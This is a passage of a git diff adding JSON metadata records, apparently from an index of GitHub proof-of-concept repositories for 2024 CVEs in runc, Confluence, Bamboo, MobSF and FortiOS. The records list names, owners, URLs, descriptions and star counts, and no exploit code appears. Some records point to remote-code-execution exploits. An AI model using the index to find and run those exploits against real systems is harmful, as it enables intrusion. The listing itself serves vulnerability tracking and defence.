1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 751422888, + "name": "CVE-2024-21626", + "full_name": "NitroCao\/CVE-2024-21626", + "owner": { + "login": "NitroCao", + "id": 17915615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17915615?v=4", + "html_url": "https:\/\/github.com\/NitroCao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NitroCao\/CVE-2024-21626", + "description": "PoC and Detection for CVE-2024-21626", + "fork": false, + "created_at": "2024-02-01T15:28:37Z", + "updated_at": "2024-12-25T00:50:30Z", + "pushed_at": "2024-02-06T16:09:05Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 71, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 751649154, + "name": "CVE-2024-21626-POC", + "full_name": "Wall1e\/CVE-2024-21626-POC", + "owner": { + "login": "Wall1e", + "id": 46126287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46126287?v=4", + "html_url": "https:\/\/github.com\/Wall1e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wall1e\/CVE-2024-21626-POC", + "description": null, + "fork": false, + "created_at": "2024-02-02T02:51:29Z", + "updated_at": "2024-07-05T07:05:37Z", + "pushed_at": "2024-02-02T09:49:34Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751664848, + "name": "CVE-2024-21626", + "full_name": "cdxiaodong\/CVE-2024-21626", + "owner": { + "login": "cdxiaodong", + "id": 84082748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84082748?v=4", + "html_url": "https:\/\/github.com\/cdxiaodong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cdxiaodong\/CVE-2024-21626", + "description": "CVE-2024-21626-poc-research-Reappearance-andtodo", + "fork": false, + "created_at": "2024-02-02T03:56:03Z", + "updated_at": "2024-04-21T01:29:16Z", + "pushed_at": "2024-02-02T04:56:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 751707713, + "name": "CVE-2024-21626", + "full_name": "zhangguanzhang\/CVE-2024-21626", + "owner": { + "login": "zhangguanzhang", + "id": 18641678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18641678?v=4", + "html_url": "https:\/\/github.com\/zhangguanzhang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhangguanzhang\/CVE-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-02-02T06:34:16Z", + "updated_at": "2024-02-05T19:02:10Z", + "pushed_at": "2024-02-02T09:53:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 751817784, + "name": "CVE-2024-21626-demo", + "full_name": "laysakura\/CVE-2024-21626-demo", + "owner": { + "login": "laysakura", + "id": 498788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/498788?v=4", + "html_url": "https:\/\/github.com\/laysakura", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laysakura\/CVE-2024-21626-demo", + "description": "Container Runtime Meetup #5 のLT用のデモ", + "fork": false, + "created_at": "2024-02-02T11:51:08Z", + "updated_at": "2024-04-17T13:23:55Z", + "pushed_at": "2024-02-02T14:33:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 753221669, + "name": "CVE-2024-21626-runcPOC", + "full_name": "V0WKeep3r\/CVE-2024-21626-runcPOC", + "owner": { + "login": "V0WKeep3r", + "id": 78677532, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78677532?v=4", + "html_url": "https:\/\/github.com\/V0WKeep3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/V0WKeep3r\/CVE-2024-21626-runcPOC", + "description": null, + "fork": false, + "created_at": "2024-02-05T17:47:01Z", + "updated_at": "2024-10-11T12:42:21Z", + "pushed_at": "2024-02-05T19:12:00Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765630308, + "name": "CVE-2024-21626", + "full_name": "abian2\/CVE-2024-21626", + "owner": { + "login": "abian2", + "id": 156372457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156372457?v=4", + "html_url": "https:\/\/github.com\/abian2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abian2\/CVE-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-03-01T09:58:50Z", + "updated_at": "2024-06-03T17:15:22Z", + "pushed_at": "2024-06-03T17:15:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 772512207, + "name": "CVE-2024-21626", + "full_name": "Sk3pper\/CVE-2024-21626", + "owner": { + "login": "Sk3pper", + "id": 13051136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13051136?v=4", + "html_url": "https:\/\/github.com\/Sk3pper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sk3pper\/CVE-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-03-15T10:38:27Z", + "updated_at": "2024-11-10T17:55:38Z", + "pushed_at": "2024-11-10T17:55:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781441452, + "name": "CVE-2024-21626", + "full_name": "KubernetesBachelor\/CVE-2024-21626", + "owner": { + "login": "KubernetesBachelor", + "id": 162622196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162622196?v=4", + "html_url": "https:\/\/github.com\/KubernetesBachelor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KubernetesBachelor\/CVE-2024-21626", + "description": "POC", + "fork": false, + "created_at": "2024-04-03T11:45:19Z", + "updated_at": "2024-08-05T17:01:03Z", + "pushed_at": "2024-04-11T15:23:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 784647452, + "name": "cve-2024-21626", + "full_name": "dorser\/cve-2024-21626", + "owner": { + "login": "dorser", + "id": 20969462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20969462?v=4", + "html_url": "https:\/\/github.com\/dorser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dorser\/cve-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-04-10T09:12:06Z", + "updated_at": "2024-05-01T19:07:43Z", + "pushed_at": "2024-04-16T18:47:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 847346997, + "name": "CVE-2024-21626", + "full_name": "FlojBoj\/CVE-2024-21626", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-08-25T15:11:42Z", + "updated_at": "2024-09-03T13:34:42Z", + "pushed_at": "2024-09-02T07:56:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884775064, + "name": "CVE-2024-21626-old-docker-versions", + "full_name": "Sk3pper\/CVE-2024-21626-old-docker-versions", + "owner": { + "login": "Sk3pper", + "id": 13051136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13051136?v=4", + "html_url": "https:\/\/github.com\/Sk3pper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sk3pper\/CVE-2024-21626-old-docker-versions", + "description": null, + "fork": false, + "created_at": "2024-11-07T11:17:45Z", + "updated_at": "2024-11-08T14:53:54Z", + "pushed_at": "2024-11-08T14:53:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892837460, + "name": "little-joke", + "full_name": "adaammmeeee\/little-joke", + "owner": { + "login": "adaammmeeee", + "id": 72557819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72557819?v=4", + "html_url": "https:\/\/github.com\/adaammmeeee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adaammmeeee\/little-joke", + "description": "Some scripts to simulate an attack (used for CVE-2024-21626)", + "fork": false, + "created_at": "2024-11-22T21:55:11Z", + "updated_at": "2024-11-22T23:37:00Z", + "pushed_at": "2024-11-22T23:36:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21633.json b/2024/CVE-2024-21633.json new file mode 100644 index 0000000000..55887e7745 --- /dev/null +++ b/2024/CVE-2024-21633.json @@ -0,0 +1,33 @@ +[ + { + "id": 740220878, + "name": "CVE-2024-21633", + "full_name": "0x33c0unt\/CVE-2024-21633", + "owner": { + "login": "0x33c0unt", + "id": 26827438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26827438?v=4", + "html_url": "https:\/\/github.com\/0x33c0unt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x33c0unt\/CVE-2024-21633", + "description": "MobSF Remote code execution (via CVE-2024-21633)", + "fork": false, + "created_at": "2024-01-07T21:34:09Z", + "updated_at": "2024-11-25T16:32:58Z", + "pushed_at": "2024-01-07T21:34:51Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 79, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21644.json b/2024/CVE-2024-21644.json new file mode 100644 index 0000000000..6c4bc76907 --- /dev/null +++ b/2024/CVE-2024-21644.json @@ -0,0 +1,33 @@ +[ + { + "id": 779492951, + "name": "CVE-2024-21644-Poc", + "full_name": "ltranquility\/CVE-2024-21644-Poc", + "owner": { + "login": "ltranquility", + "id": 118518854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118518854?v=4", + "html_url": "https:\/\/github.com\/ltranquility", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ltranquility\/CVE-2024-21644-Poc", + "description": null, + "fork": false, + "created_at": "2024-03-30T01:00:31Z", + "updated_at": "2024-03-30T01:07:26Z", + "pushed_at": "2024-03-30T01:08:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21683.json b/2024/CVE-2024-21683.json new file mode 100644 index 0000000000..568b1cebd5 --- /dev/null +++ b/2024/CVE-2024-21683.json @@ -0,0 +1,192 @@ +[ + { + "id": 804651510, + "name": "-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "full_name": "r00t7oo2jm\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "owner": { + "login": "r00t7oo2jm", + "id": 90321909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90321909?v=4", + "html_url": "https:\/\/github.com\/r00t7oo2jm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00t7oo2jm\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "description": "This vulnerability allows an unauthenticated attacker to remotely execute arbitrary code on a vulnerable Confluence server. The vulnerability exists due to an improper validation of user-supplied input in the Confluence REST API. This allows an attacker to inject malicious code into the Confluence server, which can then be executed by the server", + "fork": false, + "created_at": "2024-05-23T02:10:24Z", + "updated_at": "2024-06-27T15:54:54Z", + "pushed_at": "2024-05-22T22:15:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 804784650, + "name": "CVE-2024-21683-RCE", + "full_name": "W01fh4cker\/CVE-2024-21683-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-21683-RCE", + "description": "CVE-2024-21683 Confluence Post Auth RCE", + "fork": false, + "created_at": "2024-05-23T09:05:40Z", + "updated_at": "2024-12-06T09:40:41Z", + "pushed_at": "2024-05-27T03:47:36Z", + "stargazers_count": 122, + "watchers_count": 122, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve-2024-21683", + "redteam" + ], + "visibility": "public", + "forks": 33, + "watchers": 122, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805211624, + "name": "-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "full_name": "absholi7ly\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "description": "This vulnerability could allow an attacker to take complete control of a vulnerable Confluence server. This could allow the attacker to steal data, modify data, or disrupt the availability of the server.", + "fork": false, + "created_at": "2024-05-24T05:38:18Z", + "updated_at": "2024-08-13T09:36:06Z", + "pushed_at": "2024-05-24T05:56:48Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806526029, + "name": "CVE-2024-21683-RCE", + "full_name": "phucrio\/CVE-2024-21683-RCE", + "owner": { + "login": "phucrio", + "id": 83689890, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83689890?v=4", + "html_url": "https:\/\/github.com\/phucrio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phucrio\/CVE-2024-21683-RCE", + "description": null, + "fork": false, + "created_at": "2024-05-27T11:14:54Z", + "updated_at": "2024-05-27T11:26:45Z", + "pushed_at": "2024-05-27T11:26:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810286209, + "name": "CVE-2024-21683", + "full_name": "xh4vm\/CVE-2024-21683", + "owner": { + "login": "xh4vm", + "id": 87658711, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87658711?v=4", + "html_url": "https:\/\/github.com\/xh4vm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xh4vm\/CVE-2024-21683", + "description": null, + "fork": false, + "created_at": "2024-06-04T12:00:00Z", + "updated_at": "2024-06-07T06:56:53Z", + "pushed_at": "2024-06-05T13:22:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896065802, + "name": "cve-2024-21683-rce", + "full_name": "XiaomingX\/cve-2024-21683-rce", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-21683-rce", + "description": "CVE-2024-21683 Confluence Post Auth RCE", + "fork": false, + "created_at": "2024-11-29T13:27:37Z", + "updated_at": "2024-12-08T18:32:02Z", + "pushed_at": "2024-11-29T13:33:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21689.json b/2024/CVE-2024-21689.json new file mode 100644 index 0000000000..5f53d8d3a8 --- /dev/null +++ b/2024/CVE-2024-21689.json @@ -0,0 +1,33 @@ +[ + { + "id": 846617835, + "name": "CVE-2024-21689", + "full_name": "salvadornakamura\/CVE-2024-21689", + "owner": { + "login": "salvadornakamura", + "id": 179244851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179244851?v=4", + "html_url": "https:\/\/github.com\/salvadornakamura", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/salvadornakamura\/CVE-2024-21689", + "description": "CVE-2024–21689 RCE Bamboo Data Center and Server Atlassian POC", + "fork": false, + "created_at": "2024-08-23T15:32:50Z", + "updated_at": "2024-11-20T16:31:02Z", + "pushed_at": "2024-08-23T15:35:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2169.json b/2024/CVE-2024-2169.json new file mode 100644 index 0000000000..1898ca8bf6 --- /dev/null +++ b/2024/CVE-2024-2169.json @@ -0,0 +1,33 @@ +[ + { + "id": 776691365, + "name": "G3-Loop-DoS", + "full_name": "douglasbuzatto\/G3-Loop-DoS", + "owner": { + "login": "douglasbuzatto", + "id": 10249957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10249957?v=4", + "html_url": "https:\/\/github.com\/douglasbuzatto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/douglasbuzatto\/G3-Loop-DoS", + "description": "This Python script automates the process of scanning for systems potentially vulnerable to the Loop DoS attack and the hypothetical CVE-2024-2169 vulnerability. It focuses on scanning ports associated with protocols susceptible to denial-of-service (DoS) attacks. The script can be used for educational purposes or authorized penetration testing.", + "fork": false, + "created_at": "2024-03-24T07:53:52Z", + "updated_at": "2024-11-06T16:58:54Z", + "pushed_at": "2024-03-24T08:00:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21733.json b/2024/CVE-2024-21733.json new file mode 100644 index 0000000000..2244314770 --- /dev/null +++ b/2024/CVE-2024-21733.json @@ -0,0 +1,33 @@ +[ + { + "id": 842879414, + "name": "CVE-2024-21733", + "full_name": "LtmThink\/CVE-2024-21733", + "owner": { + "login": "LtmThink", + "id": 110249505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110249505?v=4", + "html_url": "https:\/\/github.com\/LtmThink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LtmThink\/CVE-2024-21733", + "description": "一个验证对CVE-2024-21733", + "fork": false, + "created_at": "2024-08-15T09:47:32Z", + "updated_at": "2024-12-30T07:34:45Z", + "pushed_at": "2024-08-16T05:52:08Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21754.json b/2024/CVE-2024-21754.json new file mode 100644 index 0000000000..f56a8e350e --- /dev/null +++ b/2024/CVE-2024-21754.json @@ -0,0 +1,33 @@ +[ + { + "id": 821072135, + "name": "CVE-2024-21754-Forti-RCE", + "full_name": "CyberSecuritist\/CVE-2024-21754-Forti-RCE", + "owner": { + "login": "CyberSecuritist", + "id": 174053555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174053555?v=4", + "html_url": "https:\/\/github.com\/CyberSecuritist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CyberSecuritist\/CVE-2024-21754-Forti-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-27T18:52:06Z", + "updated_at": "2024-09-16T16:57:36Z", + "pushed_at": "2024-06-27T19:16:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21762.json b/2024/CVE-2024-21762.json new file mode 100644 index 0000000000..1a0e6c05b9 --- /dev/null +++ b/2024/CVE-2024-21762.json @@ -0,0 +1,219 @@ +[ + { + "id": 764866619, + "name": "cve-2024-21762-check", + "full_name": "BishopFox\/cve-2024-21762-check", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/cve-2024-21762-check", + "description": "Safely detect whether a FortiGate SSL VPN is vulnerable to CVE-2024-21762", + "fork": false, + "created_at": "2024-02-28T21:16:10Z", + "updated_at": "2024-12-17T08:07:06Z", + "pushed_at": "2024-07-05T09:37:05Z", + "stargazers_count": 95, + "watchers_count": 95, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 95, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 770363870, + "name": "CVE-2024-21762-Checker", + "full_name": "cleverg0d\/CVE-2024-21762-Checker", + "owner": { + "login": "cleverg0d", + "id": 108401157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108401157?v=4", + "html_url": "https:\/\/github.com\/cleverg0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cleverg0d\/CVE-2024-21762-Checker", + "description": "This script performs vulnerability scanning for CVE-2024-21762, a Fortinet SSL VPN remote code execution vulnerability. It checks whether a given server is vulnerable to this CVE by sending specific requests and analyzing the responses.", + "fork": false, + "created_at": "2024-03-11T12:28:05Z", + "updated_at": "2025-01-07T23:28:56Z", + "pushed_at": "2024-03-25T11:28:23Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 771422074, + "name": "CVE-2024-21762", + "full_name": "h4x0r-dz\/CVE-2024-21762", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-21762", + "description": "out-of-bounds write in Fortinet FortiOS CVE-2024-21762 vulnerability ", + "fork": false, + "created_at": "2024-03-13T09:17:28Z", + "updated_at": "2024-12-28T14:37:25Z", + "pushed_at": "2024-03-16T00:35:12Z", + "stargazers_count": 128, + "watchers_count": 128, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 128, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 771765194, + "name": "CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check", + "full_name": "r4p3c4\/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check", + "owner": { + "login": "r4p3c4", + "id": 111358086, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111358086?v=4", + "html_url": "https:\/\/github.com\/r4p3c4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4p3c4\/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check", + "description": "Chequea si tu firewall es vulnerable a CVE-2024-21762 (RCE sin autenticación)", + "fork": false, + "created_at": "2024-03-13T22:57:00Z", + "updated_at": "2024-11-19T18:50:22Z", + "pushed_at": "2024-03-24T22:01:21Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773292574, + "name": "CVE-2024-21762", + "full_name": "d0rb\/CVE-2024-21762", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-21762", + "description": "The PoC demonstrates the potential for remote code execution by exploiting the identified security flaw.", + "fork": false, + "created_at": "2024-03-17T09:15:22Z", + "updated_at": "2024-12-25T11:30:36Z", + "pushed_at": "2024-03-17T09:20:35Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817578503, + "name": "cve-2024-21762-checker", + "full_name": "rdoix\/cve-2024-21762-checker", + "owner": { + "login": "rdoix", + "id": 59075479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59075479?v=4", + "html_url": "https:\/\/github.com\/rdoix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rdoix\/cve-2024-21762-checker", + "description": null, + "fork": false, + "created_at": "2024-06-20T02:58:02Z", + "updated_at": "2024-06-20T10:27:38Z", + "pushed_at": "2024-06-20T03:41:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893344306, + "name": "cve-2024-21762-poc", + "full_name": "XiaomingX\/cve-2024-21762-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-21762-poc", + "description": "CVE-2024-21762 是 Fortinet 公司的 FortiOS 和 FortiProxy 产品中的一个严重漏洞,存在于其 SSL VPN 组件中。", + "fork": false, + "created_at": "2024-11-24T07:20:45Z", + "updated_at": "2025-01-07T16:51:27Z", + "pushed_at": "2024-11-24T08:07:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + 